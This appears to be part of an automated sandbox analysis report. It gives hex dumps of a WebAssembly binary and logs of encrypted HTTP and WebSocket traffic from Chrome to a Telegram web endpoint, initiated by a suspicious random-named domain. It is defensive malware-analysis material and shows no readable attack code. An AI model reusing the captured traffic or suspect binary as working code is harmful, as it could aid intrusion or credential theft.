                                  2025-01-12 00:03:54 UTC1369INData Raw: 03 7f 7f 7e 00 60 04 7f 7f 7d 7f 00 60 05 7f 7f 7d 7d 7f 00 60 06 7f 7f 7d 7d 7f 7f 00 60 03 7f 7e 7f 00 60 03 7f 7e 7e 00 60 05 7f 7d 7d 7f 7f 00 60 05 7f 7d 7d 7d 7f 00 60 05 7f 7d 7d 7d 7d 00 60 07 7f 7d 7d 7d 7d 7d 7f 00 60 07 7f 7d 7d 7d 7d 7d 7d 00 60 02 7f 7c 00 60 05 7d 7f 7f 7f 7f 00 60 04 7f 7d 7d 7d 01 7f 60 02 7f 7c 01 7f 60 05 7f 7c 7c 7c 7c 01 7f 60 01 7e 01 7f 60 03 7e 7f 7f 01 7f 60 04 7e 7e 7e 7e 01 7f 60 02 7d 7f 01 7f 60 02 7d 7d 01 7f 60 01 7c 01 7f 60 02 7f 7f 01 7e 60 03 7f 7f 7d 01 7d 60 03 7f 7d 7d 01 7d 60 04 7f 7d 7d 7d 01 7d 60 02 7e 7e 01 7d 60 02 7d 7f 01 7d 60 04 7d 7d 7d 7d 01 7d 60 02 7f 7f 01 7c 60 03 7f 7f 7f 01 7c 60 02 7e 7e 01 7c 60 01 7c 01 7c 02 c6 01 1e 01 61 01 61 00 06 01 61 01 62 00 0f 01 61 01 63 00 00 01 61 01
                                  Data Ascii: ~`}`}}`}}`~`~~`}}`}}}`}}}}`}}}}}`}}}}}}`|`}`}}}`|`||||`~`~`~~~~`}`}}`|`~`}}`}}}`}}}}`~~}`}}`}}}}}`|`|`~~|`||aaabaca
                                  2025-01-12 00:03:54 UTC1369INData Raw: 00 04 01 05 05 29 1c 05 29 01 1c 01 01 01 00 2f 00 03 01 01 04 00 2f 00 00 00 00 0b 02 0a 0b 0b 02 0a 0b 0b 03 01 17 01 05 17 02 03 09 05 06 5c 3a 00 20 08 09 08 03 20 08 03 04 20 01 08 01 02 03 03 01 03 05 3e 58 04 54 06 15 23 15 01 01 00 00 02 01 01 03 01 03 02 01 03 01 03 05 1b 51 39 06 04 01 21 03 00 01 01 03 00 18 01 53 01 01 04 02 01 00 01 02 04 02 00 02 02 01 01 00 08 03 04 03 14 02 02 02 02 01 04 02 01 00 02 01 02 01 02 01 02 01 02 01 02 01 02 02 02 02 01 04 02 01 03 02 02 01 00 02 00 04 00 00 02 02 02 02 02 02 01 06 05 27 01 03 04 05 01 01 01 01 01 04 02 02 00 00 02 00 03 00 00 01 00 01 01 02 03 01 04 00 01 00 01 01 01 00 01 03 00 00 00 02 04 03 01 00 04 02 04 02 04 02 01 01 03 02 00 06 01 02 08 04 02 04 02 02 02 00 0d 01 04 04 00 04 03 01 01 01
                                  Data Ascii: ))//\: >XT#Q9!S'
                                  2025-01-12 00:03:54 UTC1369INData Raw: 08 00 00 06 08 02 08 02 02 02 03 03 03 03 03 03 04 04 1d 01 0f 0c 06 09 01 7f 01 41 e0 fc c1 02 0b 07 59 12 01 43 00 af 12 01 44 00 ae 12 01 45 00 85 0e 01 46 00 1f 01 47 00 94 0c 01 48 00 ad 12 01 49 00 f2 11 01 4a 00 b4 11 01 4b 00 47 01 4c 00 eb 01 01 4d 00 8d 0f 01 4e 00 f9 0e 01 4f 00 b7 0c 01 50 00 b6 0c 01 51 00 b5 0c 01 52 00 b4 0c 01 53 00 b3 0c 01 54 00 b2 0c 09 fa 07 01 00 41 01 0b 89 04 d7 04 fd 0a d7 04 d7 04 f4 08 ab 10 a5 10 da 0c 80 01 a0 0e b1 0c b0 0c af 0c ae 0c ad 0c ab 0c aa 0c a9 0c 87 0c 8c 0c 84 0c 83 0c fa 06 81 0c 80 0c 80 01 e6 0b dd 0b dc 0b da 0b d9 0b e3 0b e2 0b d5 06 c7 0b c6 0b 80 01 a4 0b 87 0b 86 0b 85 0b 80 0b ff 0a fe 0a fc 0a 8f 0b 8e 0b 8d 0b d4 0a cd 04 dc 0a db 0a da 0a da 02 90 0b 53 91 0b a7 0a f2 05 a1 0a a0 0a
                                  Data Ascii: AYCDEFGHIJKGLMNOPQRSTAS
                                  2025-01-12 00:03:54 UTC1369INData Raw: 02 41 03 76 22 02 41 03 74 41 f8 f7 01 6a 47 1a 20 04 20 03 28 02 0c 22 01 46 04 40 41 d0 f7 01 41 d0 f7 01 28 02 00 41 7e 20 02 77 71 36 02 00 0c 03 0b 20 04 20 01 36 02 0c 20 01 20 04 36 02 08 0c 02 0b 20 03 28 02 18 21 06 02 40 20 03 20 03 28 02 0c 22 01 47 04 40 20 04 20 03 28 02 08 22 02 4d 04 40 20 02 28 02 0c 1a 0b 20 02 20 01 36 02 0c 20 01 20 02 36 02 08 0c 01 0b 02 40 20 03 41 14 6a 22 02 28 02 00 22 04 0d 00 20 03 41 10 6a 22 02 28 02 00 22 04 0d 00 41 00 21 01 0c 01 0b 03 40 20 02 21 07 20 04 22 01 41 14 6a 22 02 28 02 00 22 04 0d 00 20 01 41 10 6a 21 02 20 01 28 02 10 22 04 0d 00 0b 20 07 41 00 36 02 00 0b 20 06 45 0d 01 02 40 20 03 20 03 28 02 1c 22 02 41 02 74 41 80 fa 01 6a 22 04 28 02 00 46 04 40 20 04 20 01 36 02 00 20 01 0d 01 41 d4 f7
                                  Data Ascii: Av"AtAjG ("F@AA(A~ wq6 6 6 (!@ ("G@ ("M@ ( 6 6@ Aj"(" Aj"("A!@ ! "Aj"(" Aj! (" A6 E@ ("AtAj"(F@ 6 A
                                  2025-01-12 00:03:54 UTC1369INData Raw: 03 36 02 00 20 03 20 01 36 02 18 0c 01 0b 20 00 41 00 41 19 20 02 41 01 76 6b 20 02 41 1f 46 1b 74 21 02 20 01 28 02 00 21 01 03 40 20 01 22 04 28 02 04 41 78 71 20 00 46 0d 02 20 02 41 1d 76 21 01 20 02 41 01 74 21 02 20 04 20 01 41 04 71 6a 22 07 41 10 6a 28 02 00 22 01 0d 00 0b 20 07 20 03 36 02 10 20 03 20 04 36 02 18 0b 20 03 20 03 36 02 0c 20 03 20 03 36 02 08 0c 01 0b 20 04 28 02 08 22 00 20 03 36 02 0c 20 04 20 03 36 02 08 20 03 41 00 36 02 18 20 03 20 04 36 02 0c 20 03 20 00 36 02 08 0b 41 f0 f7 01 41 f0 f7 01 28 02 00 41 7f 6a 22 00 36 02 00 20 00 0d 00 41 98 fb 01 21 03 03 40 20 03 28 02 00 22 00 41 08 6a 21 03 20 00 0d 00 0b 41 f0 f7 01 41 7f 36 02 00 0b 0b 1f 01 01 7f 20 00 10 93 01 04 40 20 00 28 02 00 21 01 20 00 10 c1 02 1a 20 01 10 1f 0b
                                  Data Ascii: 6 6 AA Avk AFt! (!@ "(Axq F Av! At! Aqj"Aj(" 6 6 6 6 (" 6 6 A6 6 6AA(Aj"6 A!@ ("Aj! AA6 @ (!
                                  2025-01-12 00:03:54 UTC1369INData Raw: 74 6a 0b 1b 01 01 7f 41 0a 21 01 20 00 10 93 01 04 7f 20 00 10 c1 02 41 7f 6a 05 20 01 0b 0b 12 00 20 00 20 02 38 02 04 20 00 20 01 38 02 00 20 00 0b 14 01 01 7f 20 00 28 02 00 21 01 20 00 41 00 36 02 00 20 01 0b 0e 00 20 00 20 01 20 01 10 ff 07 10 ce 0c 0b c2 01 02 03 7f 01 7e 02 40 02 40 20 00 29 03 70 22 04 50 45 04 40 20 00 29 03 78 20 04 59 0d 01 0b 20 00 10 fb 0e 22 02 41 7f 4a 0d 01 0b 20 00 41 00 36 02 68 41 7f 0f 0b 20 00 28 02 08 21 01 02 40 02 40 20 00 29 03 70 22 04 50 0d 00 20 04 20 00 29 03 78 42 7f 85 7c 22 04 20 01 20 00 28 02 04 22 03 6b ac 59 0d 00 20 00 20 03 20 04 a7 6a 36 02 68 0c 01 0b 20 00 20 01 36 02 68 0b 02 40 20 01 45 04 40 20 00 28 02 04 21 00 0c 01 0b 20 00 20 00 29 03 78 20 01 20 00 28 02 04 22 00 6b 41 01 6a ac 7c 37 03 78
                                  Data Ascii: tjA! Aj 8 8 (! A6 ~@@ )p"PE@ )x Y "AJ A6hA (!@@ )p"P )xB|" ("kY j6h 6h@ E@ (! )x ("kAj|7x
                                  2025-01-12 00:03:54 UTC1369INData Raw: 20 01 0c 01 0b 20 01 28 02 08 0b 21 04 20 01 20 02 36 02 08 20 04 20 02 36 02 0c 20 02 20 01 36 02 0c 20 02 20 04 36 02 08 0b 41 e4 f7 01 20 07 36 02 00 41 d8 f7 01 20 03 36 02 00 0c 0c 0b 41 d4 f7 01 28 02 00 22 0a 45 0d 01 20 0a 41 00 20 0a 6b 71 41 7f 6a 22 00 20 00 41 0c 76 41 10 71 22 00 76 22 01 41 05 76 41 08 71 22 02 20 00 72 20 01 20 02 76 22 00 41 02 76 41 04 71 22 01 72 20 00 20 01 76 22 00 41 01 76 41 02 71 22 01 72 20 00 20 01 76 22 00 41 01 76 41 01 71 22 01 72 20 00 20 01 76 6a 41 02 74 41 80 fa 01 6a 28 02 00 22 01 28 02 04 41 78 71 20 05 6b 21 03 20 01 21 02 03 40 02 40 20 02 28 02 10 22 00 45 04 40 20 02 28 02 14 22 00 45 0d 01 0b 20 00 28 02 04 41 78 71 20 05 6b 22 02 20 03 20 02 20 03 49 22 02 1b 21 03 20 00 20 01 20 02 1b 21 01 20 00
                                  Data Ascii: (! 6 6 6 6A 6A 6A("E A kqAj" AvAq"v"AvAq" r v"AvAq"r v"AvAq"r v"AvAq"r vjAtAj("(Axq k! !@@ ("E@ ("E (Axq k" I"! !
                                  2025-01-12 00:03:54 UTC1369INData Raw: 6a 41 70 71 41 d8 aa d5 aa 05 73 36 02 00 41 bc fb 01 41 00 36 02 00 41 8c fb 01 41 00 36 02 00 41 80 20 0b 22 02 6a 22 06 41 00 20 02 6b 22 07 71 22 02 20 05 4d 0d 09 41 88 fb 01 28 02 00 22 03 04 40 41 80 fb 01 28 02 00 22 08 20 02 6a 22 09 20 08 4d 20 09 20 03 4b 72 0d 0a 0b 41 8c fb 01 2d 00 00 41 04 71 0d 04 02 40 02 40 41 e8 f7 01 28 02 00 22 03 04 40 41 90 fb 01 21 00 03 40 20 00 28 02 00 22 08 20 03 4d 04 40 20 08 20 00 28 02 04 6a 20 03 4b 0d 03 0b 20 00 28 02 08 22 00 0d 00 0b 0b 41 00 10 b2 02 22 01 41 7f 46 0d 05 20 02 21 06 41 ac fb 01 28 02 00 22 00 41 7f 6a 22 03 20 01 71 04 40 20 02 20 01 6b 20 01 20 03 6a 41 00 20 00 6b 71 6a 21 06 0b 20 06 20 05 4d 20 06 41 fe ff ff ff 07 4b 72 0d 05 41 88 fb 01 28 02 00 22 00 04 40 41 80 fb 01 28 02 00
                                  Data Ascii: jApqAs6AA6AA6A "j"A k"q" MA("@A(" j" M KrA-Aq@@A("@A!@ (" M@ (j K ("A"AF !A("Aj" q@ k jA kqj! M AKrA("@A(
                                  2025-01-12 00:03:54 UTC1255INData Raw: 04 41 03 74 41 f8 f7 01 6a 47 1a 20 03 20 01 28 02 0c 22 02 46 04 40 41 d0 f7 01 41 d0 f7 01 28 02 00 41 7e 20 04 77 71 36 02 00 0c 02 0b 20 03 20 02 36 02 0c 20 02 20 03 36 02 08 0c 01 0b 20 01 28 02 18 21 08 02 40 20 01 20 01 28 02 0c 22 06 47 04 40 20 04 20 01 28 02 08 22 02 4d 04 40 20 02 28 02 0c 1a 0b 20 02 20 06 36 02 0c 20 06 20 02 36 02 08 0c 01 0b 02 40 20 01 41 14 6a 22 03 28 02 00 22 05 0d 00 20 01 41 10 6a 22 03 28 02 00 22 05 0d 00 41 00 21 06 0c 01 0b 03 40 20 03 21 02 20 05 22 06 41 14 6a 22 03 28 02 00 22 05 0d 00 20 06 41 10 6a 21 03 20 06 28 02 10 22 05 0d 00 0b 20 02 41 00 36 02 00 0b 20 08 45 0d 00 02 40 20 01 20 01 28 02 1c 22 02 41 02 74 41 80 fa 01 6a 22 03 28 02 00 46 04 40 20 03 20 06 36 02 00 20 06 0d 01 41 d4 f7 01 41 d4 f7 01
                                  Data Ascii: AtAjG ("F@AA(A~ wq6 6 6 (!@ ("G@ ("M@ ( 6 6@ Aj"(" Aj"("A!@ ! "Aj"(" Aj! (" A6 E@ ("AtAj"(F@ 6 AA


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  58192.168.2.649907149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:53 UTC450OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 216
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:53 UTC216OUTData Raw: 2a 10 06 78 25 cb 00 4d a9 28 ec 3f 51 fe bd 6e 72 20 75 02 09 e6 d6 2c b7 74 66 e6 43 21 07 ae 1f e6 3e 36 2a a5 c2 94 00 5e 61 fd f5 76 4f aa fa dc e8 53 b7 05 dd 25 71 78 88 3f 76 09 41 87 2a 87 46 cd 8d b9 ea 99 18 be 00 a2 66 6c 26 0e c9 0d 44 1f 79 13 d9 81 ce f9 d5 68 6c 84 4d 4c 78 fa 49 12 11 4f b8 ad 16 1b f3 ab 64 3f 1e f3 27 32 f5 8b 13 78 1c 26 e0 f2 75 cc 3c b4 a0 6c f8 a5 67 c2 f9 67 c3 82 e7 18 8b f5 70 ca 35 d3 1d 84 d8 1f b0 d2 ad 47 b2 61 3a 9a a5 73 29 68 5e 82 68 ed 2d 34 95 7c 6a 0d e2 a6 fd 09 6b b3 67 95 7a d3 8a 5a 12 5a b1 c8 1e 88 71 4b 1e c7 c2 43 9d cd 50 c1 6b 3d 4b ee 1e 80 39 ae db c7 82 c9 1b f8 82 31 ce 95
                                  Data Ascii: *x%M(?Qnr u,tfC!>6*^avOS%qx?vA*Ffl&DyhlMLxIOd?'2x&u<lggp5Ga:s)h^h-4|jkgzZZqKCPk=K91
                                  2025-01-12 00:03:54 UTC408INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:54 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 104
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:03:54 UTC104INData Raw: 2a 10 06 78 25 cb 00 4d 8a be f9 e6 b1 02 05 cc de 90 9e ad ba 1c 93 1d 40 9a 23 80 86 f9 bb 72 94 6a 3b 09 a0 65 0f c6 63 04 6b 0e cb 3a 8a 92 b8 92 97 30 c5 19 b6 16 89 9a d1 54 7c d4 f7 7b aa b8 08 4d 00 e5 0f 70 a2 a2 5b 3f 53 ac ee ab 1d 72 d6 81 d7 2e 45 b3 7b 2f 87 94 a2 93 6f 1c 2a f8 05 91 04 0c 49 fa
                                  Data Ascii: *x%M@#rj;eck:0T|{Mp[?Sr.E{/o*I


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  59192.168.2.649910149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:53 UTC350OUTGET /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:54 UTC355INHTTP/1.1 404 Not Found
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:54 GMT
                                  Content-Type: text/html
                                  Content-Length: 169
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  2025-01-12 00:03:54 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 30 2e 33 2e 33 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/0.3.33</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  60192.168.2.649906149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:53 UTC539OUTGET /apiws HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: Upgrade
                                  Pragma: no-cache
                                  Cache-Control: no-cache
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Upgrade: websocket
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-WebSocket-Version: 13
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  Sec-WebSocket-Key: WrRtoR/HlyjyXfTPMkvI3g==
                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                  Sec-WebSocket-Protocol: binary
                                  2025-01-12 00:03:54 UTC193INHTTP/1.1 404 Not Found
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:54 GMT
                                  Content-Type: text/html
                                  Content-Length: 169
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  2025-01-12 00:03:54 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 30 2e 33 2e 33 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/0.3.33</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  61192.168.2.649919149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:54 UTC449OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 88
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:54 UTC88OUTData Raw: 2a 10 06 78 25 cb 00 4d a5 04 1d f6 a3 8a 6c 0c 7e e7 36 18 69 74 50 d5 6d e7 34 b4 2d e4 ec 68 a0 94 23 e8 c5 0a 19 3a c0 7f ce 15 e9 14 77 bb 26 3c 86 73 46 9f e5 89 91 8e 92 f3 19 33 04 cd 4b 6a 60 2b ff cc 6e 80 7e c0 bd c1 2d c0 a7 98 8e e9 60 94 77 40 ba 37
                                  Data Ascii: *x%Ml~6itPm4-h#:w&<sF3Kj`+n~-`w@7
                                  2025-01-12 00:03:55 UTC408INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:55 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 584
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:03:55 UTC584INData Raw: 2a 10 06 78 25 cb 00 4d 13 b4 b7 51 9c 75 ff 1c 42 00 17 cb 29 61 b0 ef 3b 36 80 77 88 76 35 af bf 5f dc 95 0c 92 a9 a4 56 2c 1c c6 b3 58 fe 6f 3f ba 2f 12 39 56 7b 49 fe ea 4b b7 7a d1 40 e4 95 12 d9 cc 8f 9d fc 0f c8 8a c3 3b e3 12 d6 f1 46 54 f9 a8 cc 61 d6 9c 78 71 77 bc 10 73 7a 51 3f 8e 3e 96 59 7c 0c 32 2c 6e 39 5e 7c 81 58 03 13 f1 a6 b1 5b ad 1f b4 dd 22 3d a1 52 a6 a3 ec e5 c0 aa cd 4b e2 f9 10 86 ee 5c 50 85 3e 0c 68 bd 5e d5 a0 2d e2 a5 91 60 19 2f b7 4d cf 48 7e d3 93 a3 6e f7 ad 50 8e 6f 6d c2 4e ed 9d c1 ef 74 5f a6 62 f4 11 82 e4 cd 37 8a 09 3e fe f2 ab ec 36 41 45 6c 11 e2 31 54 68 60 bb 34 77 c2 10 69 28 e3 14 94 c8 1e 12 a0 29 57 35 d5 b0 5f 98 e4 9e e8 29 f5 88 59 4e 42 96 a0 c5 04 b8 ce e6 49 ff b0 09 25 84 e7 95 44 37 03 83 6d b7 20
                                  Data Ascii: *x%MQuB)a;6wv5_V,Xo?/9V{IKz@;FTaxqwszQ?>Y|2,n9^|X["=RK\P>h^-`/MH~nPomNt_b7>6AEl1Th`4wi()W5_)YNBI%D7m


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  62192.168.2.649918149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:54 UTC450OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 248
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:54 UTC248OUTData Raw: 2a 10 06 78 25 cb 00 4d ef b9 0e 75 61 93 bf 73 4b e4 3b 61 9b 47 9a 5e ac 7f 4a 0f b7 5d 7e c8 3e bb d7 0d 11 be ff 8f da bf 7f 94 3b b7 ce 57 2d 73 3e 1d 92 cb 86 78 86 6b 00 11 85 a9 a4 92 b3 66 6e 6b 58 06 29 3d 02 b5 6c 7c b4 23 6e 34 e1 9e ea da 4b e6 41 b4 8b 6d cd 6f 5c f9 6a b0 05 ba 60 36 70 75 ad 77 c6 63 ff b5 17 ce 05 82 6a 5b c3 3b 28 2b ef 89 1f bb 19 f5 3a cc 27 ff 60 72 d6 94 32 63 3c 1e aa d6 03 dc c4 1a 6a 36 fa 8a ab 72 e7 13 66 d1 6e 29 6b 03 5f 3f 1c c8 2b 63 32 a6 e6 49 15 3d 9c 9d 63 bc bd d1 47 24 2d e8 46 79 16 f0 51 52 74 29 65 aa ad 66 e1 d5 45 00 e3 a7 c9 c8 94 3e a1 87 c5 5d eb 56 eb 0d 27 e0 78 c7 fe 37 67 a8 09 97 09 f1 6c 35 18 86 05 41 5a 0b c2 c1 8d de 5a c4 45 a1 b2 05 5c 9a 4a d6 6e 49 2f 9d bc b3
                                  Data Ascii: *x%MuasK;aG^J]~>;W-s>xkfnkX)=l|#n4KAmo\j`6puwcj[;(+:'`r2c<j6rfn)k_?+c2I=cG$-FyQRt)efE>]V'x7gl5AZZE\JnI/
                                  2025-01-12 00:03:54 UTC408INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:54 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 200
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:03:54 UTC200INData Raw: 2a 10 06 78 25 cb 00 4d 06 6e 98 2f fe 29 32 25 a8 e1 7f c1 63 45 d8 4d d3 84 60 f5 cf 27 11 97 00 d3 4b c8 81 b8 0d 5d a5 5c ef 0f ab 76 12 28 89 fc 64 a3 36 a2 4c 09 ff a2 9c ed ca a3 04 fc e8 9c f5 40 c8 92 96 ed 5f a2 1f f2 a6 c2 41 aa f8 36 12 8b 7f bb 8a 6d 24 5e 16 c2 a2 b8 ec 94 2b 7f d7 eb 17 e9 f6 1a a7 91 21 43 c9 3f 27 95 35 95 17 f3 61 ee 17 76 77 45 1c a6 4d 5e d7 fe 62 cb 1d 78 4a c9 73 23 eb d5 a4 a9 20 74 0f d2 a9 ba c5 64 ca 70 09 cb 8f e8 c0 1a fe 90 2a 1b 1b 37 52 27 1c 46 e6 34 0f 26 05 10 6a 6f 32 1e fd d9 61 f4 39 54 2d b8 f3 20 b6 dc 5e 85 77 82 19 60 01 ac cc 33 12 fd
                                  Data Ascii: *x%Mn/)2%cEM`'K]\v(d6L@_A6m$^+!C?'5avwEM^bxJs# tdp*7R'F4&jo2a9T- ^w`3


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  63192.168.2.649920149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:54 UTC350OUTGET /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:54 UTC355INHTTP/1.1 404 Not Found
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:54 GMT
                                  Content-Type: text/html
                                  Content-Length: 169
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  2025-01-12 00:03:54 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 30 2e 33 2e 33 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/0.3.33</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
